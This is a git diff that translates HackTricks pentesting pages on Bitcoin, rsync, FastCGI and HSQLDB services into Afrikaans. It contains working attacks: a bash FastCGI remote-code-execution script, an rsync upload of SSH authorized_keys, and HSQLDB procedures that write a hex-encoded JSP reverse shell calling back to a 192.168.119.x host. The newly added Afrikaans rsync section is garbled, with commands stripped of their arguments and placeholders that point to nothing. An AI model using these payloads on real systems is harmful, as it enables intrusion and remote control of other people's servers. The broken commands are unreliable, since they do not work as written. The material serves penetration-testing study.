-## Basic Information +## Basiese Inligting -* The **port 8333** is used by Bitcoin nodes in the **mainnet** to communicate between them. -* The **port 18333** is used Bitcoin nodes in the **testnet** to communicate between them. -* The **port 38333** is used Bitcoin nodes in the **signet** to communicate between them. -* The **port 18444** is used Bitcoin nodes in the **regtest** (local) to communicate between them. - -**Default port:** 8333, 18333, 38333, 18444 +* Die **poort 8333** word deur Bitcoin-nodes in die **mainnet** gebruik om met mekaar te kommunikeer. +* Die **poort 18333** word deur Bitcoin-nodes in die **testnet** gebruik om met mekaar te kommunikeer. +* Die **poort 38333** word deur Bitcoin-nodes in die **signet** gebruik om met mekaar te kommunikeer. +* Die **poort 18444** word deur Bitcoin-nodes in die **regtest** (plaaslike) gebruik om met mekaar te kommunikeer. +**Verstekpoort:** 8333, 18333, 38333, 18444 ``` PORT STATE SERVICE 8333/tcp open bitcoin ``` - ### Shodan * `port:8333 bitcoin` * `User-Agent: /Satoshi` -## Enumeration - -Bitcoin nodes will give you some information if they think that you are another valid bitcoin node. **Nmap** have some script to extract this information: +## Opstel +Bitcoin-nodes sal jou enkele inligting gee as hulle dink jy is 'n geldige bitcoin-node. **Nmap** het 'n paar skripte om hierdie inligting te onttrek: ``` sudo nmap -p 8333 --script bitcoin-info --script bitcoin-getaddr 170.39.103.39 PORT STATE SERVICE 8333/tcp open bitcoin -| bitcoin-info: +| bitcoin-info: | Timestamp: 2022-04-08T22:33:58 | Network: main | Version: 0.7.0 @@ -50,22 +47,21 @@ PORT STATE SERVICE sudo nmap -p 8333 --script bitcoin-getaddr 170.39.103.39 PORT STATE SERVICE 8333/tcp open bitcoin -| bitcoin-getaddr: +| bitcoin-getaddr: | ip timestamp | 2a02:c7e:486a:2b00:3d26:db39:537f:59f2:8333 2022-03-25T07:30:45 | 2600:1f1c:2d3:2403:7b7d:c11c:ca61:f6e2:8333 2022-04-08T07:16:38 | 75.128.4.27:8333 2022-04-02T08:10:45 [...] ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/873-pentesting-rsync.md b/network-services-pentesting/873-pentesting-rsync.md index 3c995ada2..cb95e193c 100644 --- a/network-services-pentesting/873-pentesting-rsync.md +++ b/network-services-pentesting/873-pentesting-rsync.md @@ -2,35 +2,94 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -From [wikipedia](https://en.wikipedia.org/wiki/Rsync): +Vanaf [wikipedia](https://en.wikipedia.org/wiki/Rsync): -> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. - -**Default port:** 873 +> **rsync** is 'n hulpmiddel vir doeltreffende [oorplasing](https://en.wikipedia.org/wiki/File\_transfer) en [sinsronisering](https://en.wikipedia.org/wiki/File\_synchronization) van [lêers](https://en.wikipedia.org/wiki/Computer\_file) tussen 'n rekenaar en 'n eksterne harde skyf en oor [netwerkgekoppelde](https://en.wikipedia.org/wiki/Computer\_network) [rekenaars](https://en.wikipedia.org/wiki/Computer) deur die [wyzigingstye](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) en groottes van lêers te vergelyk.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Dit word algemeen gevind op [Unix-soortgelyke](https://en.wikipedia.org/wiki/Unix-like) [bedryfstelsels](https://en.wikipedia.org/wiki/Operating\_system). Die rsync-algoritme is 'n tipe [delta-kodering](https://en.wikipedia.org/wiki/Delta\_encoding) en word gebruik om netwerkgebruik te verminder. [Zlib](https://en.wikipedia.org/wiki/Zlib) kan gebruik word vir addisionele [datakompressie](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) en [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) of [stunnel](https://en.wikipedia.org/wiki/Stunnel) kan gebruik word vir sekuriteit. +**Verstekpoort:** 873 ``` PORT STATE SERVICE REASON 873/tcp open rsync syn-ack ``` +## Opname -## Enumeration +### Baniere & Handleiding kommunikasie -### Banner & Manual communication +Die eerste stap in die opname van 'n rsync-diens is om die baniere en handleiding kommunikasie te ondersoek. Hierdie inligting kan waardevolle inligting verskaf oor die diens en moontlike kwesbaarhede. +#### Baniere + +Om die baniere van 'n rsync-diens te ondersoek, kan jy die volgende opdrag gebruik: + +```bash +nc +``` + +As jy 'n suksesvolle verbinding maak, sal jy die baniere van die rsync-diens sien. Hierdie inligting kan nuttig wees om die spesifieke weergawe van die rsync-diens te identifiseer en moontlike kwesbaarhede te vind. + +#### Handleiding kommunikasie + +Om die handleiding kommunikasie van 'n rsync-diens te ondersoek, kan jy die volgende opdrag gebruik: + +```bash +rsync :: +``` + +Hierdie opdrag sal 'n lys van beskikbare modules vir die rsync-diens gee. Dit kan nuttige inligting verskaf oor die struktuur en inhoud van die diens. + +### Portskandering + +Die volgende stap in die opnameproses is om die poorte van die rsync-diens te skandeer om te bepaal watter poorte oop is en beskikbaar is vir kommunikasie. + +Jy kan 'n skandering van die poorte uitvoer deur die volgende opdrag te gebruik: + +```bash +nmap -p +``` + +Vervang `` met die spesifieke poortreeks wat jy wil skandeer, en `` met die IP-adres van die teikenstelsel. + +Die resultate van die poortskandering kan aandui watter poorte oop is en moontlik toegang tot die rsync-diens bied. + +### Module-analise + +Nadat jy 'n lys van beskikbare modules vir die rsync-diens verkry het, kan jy elke module ondersoek om te bepaal watter aksies en funksies beskikbaar is. + +Om 'n spesifieke module te ondersoek, kan jy die volgende opdrag gebruik: + +```bash +rsync :: +``` + +Vervang `` met die IP-adres van die teikenstelsel en `` met die naam van die spesifieke module wat jy wil ondersoek. + +Hierdie analise kan jou help om die funksionaliteit en moontlike kwesbaarhede van elke module te verstaan. + +### Verkenning van kwesbaarhede + +Nadat jy die rsync-diens ondersoek het, kan jy spesifieke kwesbaarhede verken om toegang tot die stelsel te verkry. + +Hier is 'n paar algemene kwesbaarhede wat jy kan ondersoek: + +- **Geen wagwoord vereis**: Sommige rsync-dienskonfigurasies mag nie 'n wagwoord vereis nie, wat beteken dat jy sonder verifikasie toegang kan verkry. +- **Onveilige oorskrywing**: As die rsync-diens oorskrywing toelaat, kan jy moontlik skadelike lêers oorskryf en uitvoerbaar maak. +- **Onveilige lêerhantering**: As die rsync-diens nie behoorlike lêerhantering toepas nie, kan jy moontlik toegang verkry tot gevoelige lêers of lêers wat nie bedoel is om gedeel te word nie. + +Deur hierdie kwesbaarhede te ondersoek, kan jy moontlik toegang tot die stelsel verkry en verdere aanvalle uitvoer. ```bash nc -vn 127.0.0.1 873 (UNKNOWN) [127.0.0.1] 873 (rsync) open @@ -38,8 +97,8 @@ nc -vn 127.0.0.1 873 @RSYNCD: 31.0 <--- Then you send the same info #list <--- Then you ask the sever to list raidroot <--- The server starts enumerating -USBCopy -NAS_Public +USBCopy +NAS_Public _NAS_Recycle_TOSRAID <--- Enumeration finished @RSYNCD: EXIT <--- Sever closes the connection @@ -52,11 +111,9 @@ nc -vn 127.0.0.1 873 raidroot @RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password ``` +### **Opsomming van Gedeelde Lêers** -### **Enumerating Shared Folders** - -**Rsync modules** are recognized as **directory shares** that might be **protected with passwords**. To identify available modules and check if they require passwords, the following commands are used: - +**Rsync-modules** word erken as **gidsaandele** wat moontlik **met wagwoorde beskerm** kan word. Om beskikbare modules te identifiseer en te kontroleer of hulle wagwoorde vereis, word die volgende opdragte gebruik: ```bash nmap -sV --script "rsync-list-modules" -p msf> use auxiliary/scanner/rsync/modules_list @@ -64,15 +121,13 @@ msf> use auxiliary/scanner/rsync/modules_list # Example with IPv6 and alternate port rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730 ``` - -Be aware that some shares might not appear in the list, possibly hiding them. Additionally, accessing some shares might be restricted to specific **credentials**, indicated by an **"Access Denied"** message. +Wees bewus dat sommige aandele moontlik nie in die lys verskyn nie en moontlik versteek is. Daarbenewens kan toegang tot sommige aandele beperk word tot spesifieke **geloofsbriewe**, aangedui deur 'n **"Toegang Geweier"** boodskap. ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync) -### Manual Rsync Usage - -Upon obtaining a **module list**, actions depend on whether authentication is needed. Without authentication, **listing** and **copying** files from a shared folder to a local directory is achieved through: +### Handleiding Rsync Gebruik +Na die verkryging van 'n **modulelys**, hang die aksies af van of verifikasie nodig is. Sonder verifikasie word **lysmaak** en **kopiëring** van lêers van 'n gedeelde vouer na 'n plaaslike gids bereik deur middel van: ```bash # Listing a shared folder rsync -av --list-only rsync://192.168.0.123/shared_name @@ -80,46 +135,39 @@ rsync -av --list-only rsync://192.168.0.123/shared_name # Copying files from a shared folder rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared ``` +Hierdie proses oordra **rekursief lêers**, met behoud van hul eienskappe en regte. -This process **recursively transfers files**, preserving their attributes and permissions. - -With **credentials**, listing and downloading from a shared folder can be done as follows, where a password prompt will appear: - +Met **volmagte**, kan die lys en aflaai vanuit 'n gedeelde vouer so gedoen word, waar 'n wagwoordversoek sal verskyn: ```bash rsync -av --list-only rsync://username@192.168.0.123/shared_name rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared ``` - -To **upload content**, such as an _**authorized_keys**_ file for access, use: - +Om inhoud soos 'n _**authorized_keys**_ lêer vir toegang te **oplaai**, gebruik: ```bash rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh ``` - ## POST -To locate the rsyncd configuration file, execute: - +Om die rsyncd-konfigurasie-lêer op te spoor, voer die volgende uit: ```bash find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) ``` - -Within this file, a _secrets file_ parameter might point to a file containing **usernames and passwords** for rsyncd authentication. +Binne hierdie lêer kan 'n _secrets-lêer_ parameter na 'n lêer verwys wat **gebruikersname en wagwoorde** vir rsyncd-verifikasie bevat. -## References +## Verwysings * [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/network-services-pentesting/9000-pentesting-fastcgi.md b/network-services-pentesting/9000-pentesting-fastcgi.md index b91d3c09e..45a07e180 100644 --- a/network-services-pentesting/9000-pentesting-fastcgi.md +++ b/network-services-pentesting/9000-pentesting-fastcgi.md @@ -1,34 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -If you want to **learn what is FastCGI** check the following page: +As jy wil **leer wat FastCGI is**, kyk na die volgende bladsy: {% content-ref url="pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md" %} [disable\_functions-bypass-php-fpm-fastcgi.md](pentesting-web/php-tricks-esp/php-useful-functions-disable\_functions-open\_basedir-bypass/disable\_functions-bypass-php-fpm-fastcgi.md) {% endcontent-ref %} -By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**. +Standaard loop **FastCGI** op **poort** **9000** en word nie deur nmap herken nie. **Gewoonlik** luister FastCGI slegs op **localhost**. # RCE -It's quiet easy to make FastCGI execute arbitrary code: - +Dit is baie maklik om FastCGI arbitrêre kode uit te voer: ```bash #!/bin/bash @@ -39,31 +36,28 @@ HOST=$1 B64=$(echo "$PAYLOAD"|base64) for FN in $FILENAMES; do - OUTPUT=$(mktemp) - env -i \ - PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ - SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ - cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT +OUTPUT=$(mktemp) +env -i \ +PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ +SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ +cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT - cat $OUTPUT +cat $OUTPUT done ``` - -or you can also use the following python script: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75) +Of jy kan ook die volgende Python-skripsie gebruik: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/9001-pentesting-hsqldb.md b/network-services-pentesting/9001-pentesting-hsqldb.md index e97c34602..e2718047e 100644 --- a/network-services-pentesting/9001-pentesting-hsqldb.md +++ b/network-services-pentesting/9001-pentesting-hsqldb.md @@ -1,112 +1,94 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** is the leading SQL relational database system written in Java. It offers a small, fast multithreaded and transactional database engine with in-memory and disk-based tables and supports embedded and server modes. - -**Default port:** 9001 +**HSQLDB \([HyperSQL-databasis](http://hsqldb.org/)\)** is die voorste SQL-relasiedatabasisstelsel wat in Java geskryf is. Dit bied 'n klein, vinnige, veelvuldig-draadse en transaksionele databasisenjin met in-memory en disk-gebaseerde tabelle en ondersteun ingebedde en bedienermodusse. +**Verstekpoort:** 9001 ```text 9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0) ``` +# Inligting -# Information +### Standaardinstellings -### Default Settings +Let daarop dat hierdie diens waarskynlik standaard in die geheue loop of aan die localhost gebind is. As jy dit gevind het, het jy waarskynlik 'n ander diens uitgebuit en is jy op soek na verhoogde regte. -Note that by default this service is likely running in memory or is bound to localhost. If you found it, you probably exploited another service and are looking to escalate privileges. - -Default credentials are usually `sa` with a blank password. - -If you’ve exploited another service, search for possible credentials using +Standaard geloofsbriewe is gewoonlik `sa` met 'n leë wagwoord. +As jy 'n ander diens uitgebuit het, soek na moontlike geloofsbriewe deur gebruik te maak van ```text grep -rP 'jdbc:hsqldb.*password.*' /path/to/search ``` +Let op die databasisnaam sorgvuldig - jy sal dit nodig hê om te verbind. -Note the database name carefully - you’ll need it to connect. +# Inligting Versameling -# Info Gathering +Verbind met die DB-instansie deur [HSQLDB af te laai](https://sourceforge.net/projects/hsqldb/files/) en `hsqldb/lib/hsqldb.jar` uit te pak. Voer die GUI-toepassing \(eww\) uit deur `java -jar hsqldb.jar` te gebruik en verbind met die instansie deur die ontdekte/swak geloofsbriewe te gebruik. -Connect to the DB instance by [downloading HSQLDB](https://sourceforge.net/projects/hsqldb/files/) and extracting `hsqldb/lib/hsqldb.jar`. Run the GUI app \(eww\) using `java -jar hsqldb.jar` and connect to the instance using the discovered/weak credentials. +Let daarop dat die verbindings-URL iets soos hierdie sal lyk vir 'n afgeleë stelsel: `jdbc:hsqldb:hsql://ip/DBNAME`. -Note the connection URL will look something like this for a remote system: `jdbc:hsqldb:hsql://ip/DBNAME`. +# Truuks -# Tricks +## Java Taal Routines -## Java Language Routines +Ons kan statiese metodes van 'n Java-klas vanuit HSQLDB oproep deur Java Taal Routines te gebruik. Let daarop dat die geroepte klas in die toepassing se klasselys moet wees. -We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath. +JRT's kan `funksies` of `prosedures` wees. Funksies kan geroep word deur SQL-stellings as die Java-metode een of meer SQL-verenigbare primitiewe veranderlikes teruggee. Hulle word geroep met die `VALUES`-stelling. -JRTs can be `functions` or `procedures`. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the `VALUES` statement. +As die Java-metode wat ons wil oproep void teruggee, moet ons 'n prosedure gebruik wat geroep word met die `CALL`-stelling. -If the Java method we want to call returns void, we need to use a procedure invoked with the `CALL` statement. - -## Reading Java System Properties - -Create function: +## Lees van Java Sisteem Eienskappe +Skep funksie: ```text CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty' ``` - -Execute function: - +Voer funksie uit: ```text VALUES(getsystemproperty('user.name')) ``` +Jy kan 'n [lys van stelsel eienskappe hier vind](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). -You can find a [list of system properties here](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html). +## Skryf Inhoud na Lêer -## Write Content to File - -You can use the `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget located in the JDK \(auto loaded into the class path of the application\) to write hex-encoded items to disk via a custom procedure. **Note the maximum size of 1024 bytes**. - -Create procedure: +Jy kan die `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` Java gadget wat in die JDK geleë is (outomaties gelaai in die klasselys van die toepassing) gebruik om heks-geënkodeerde items na skyf te skryf deur middel van 'n aangepaste prosedure. **Let op die maksimum grootte van 1024 byte**. +Skep prosedure: ```text CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024)) LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename' ``` - -Execute procedure: - +Voer prosedure uit: ```text call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024))) ``` - - -
